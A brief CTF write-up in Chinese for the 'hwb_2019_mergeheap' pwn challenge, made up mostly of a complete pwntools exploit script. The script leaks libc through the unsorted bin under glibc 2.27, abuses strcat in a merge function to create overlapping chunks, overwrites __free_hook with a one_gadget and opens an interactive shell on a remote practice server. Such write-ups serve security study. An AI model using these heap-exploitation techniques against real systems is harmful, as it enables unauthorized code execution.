hwb_2019_mergeheap
查看保护
利用str的特性遇见\x00会被截断
攻击思路:2.27下泄露lib需要填满7个再释放的时候就是进unsortedbin了。利用strcat将下一个堆块的size都复制过来,形成堆块重叠,然后任意地址写,改hook为one_gadget,
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 1
if debug:
r = remote('node4.buuoj.cn', 29472)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = '>>'
def add(size, content):
r.sendlineafter(menu, '1')
r.sendlineafter('len:', str(size))
r.sendlineafter('content:', content)
def show(index):
r.sendlineafter(menu, '2')
r.sendlineafter('idx:', str(index))
def delete(index):
r.sendlineafter(menu, '3')
r.sendlineafter('idx:', str(index))
def merge(idx1,idx2):
r.sendlineafter(menu, '4')
r.sendlineafter('idx1:', str(idx1))
r.sendlineafter('idx2:', str(idx2))
for i in range(8):
add(0x80,'aaaaa')
for i in range(1,8):
delete(i)
delete(0)
add(0x8,'aaaaaaaa')#0
show(0)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 224 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc = ELF('./2.27/libc-2.27.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = one[1] + libc_base
add(0x60, 'aaaa')
add(0x30, 'a'*0x30)#2
add(0x38, 'a'*0x38)#3
add(0x100, 'aaaa')#4
add(0x68, 'aaaa')#5
add(0x20, 'aaaa')#6
add(0x20, 'aaaa')#7
add(0x20, 'aaaa')#8
add(0x20, 'aaaa')#9
delete(5)
delete(7)
delete(8)
merge(2, 3)
delete(6)
payload1 = b'a' * 0x28 +p64(0x30) + p64(free_hook) + p64(0)
add(0x100, payload1)
add(0x20, 'aaaa')
add(0x20, 'aaaa')
add(0x20, p64(one_gadget))
delete(9)
r.interactive()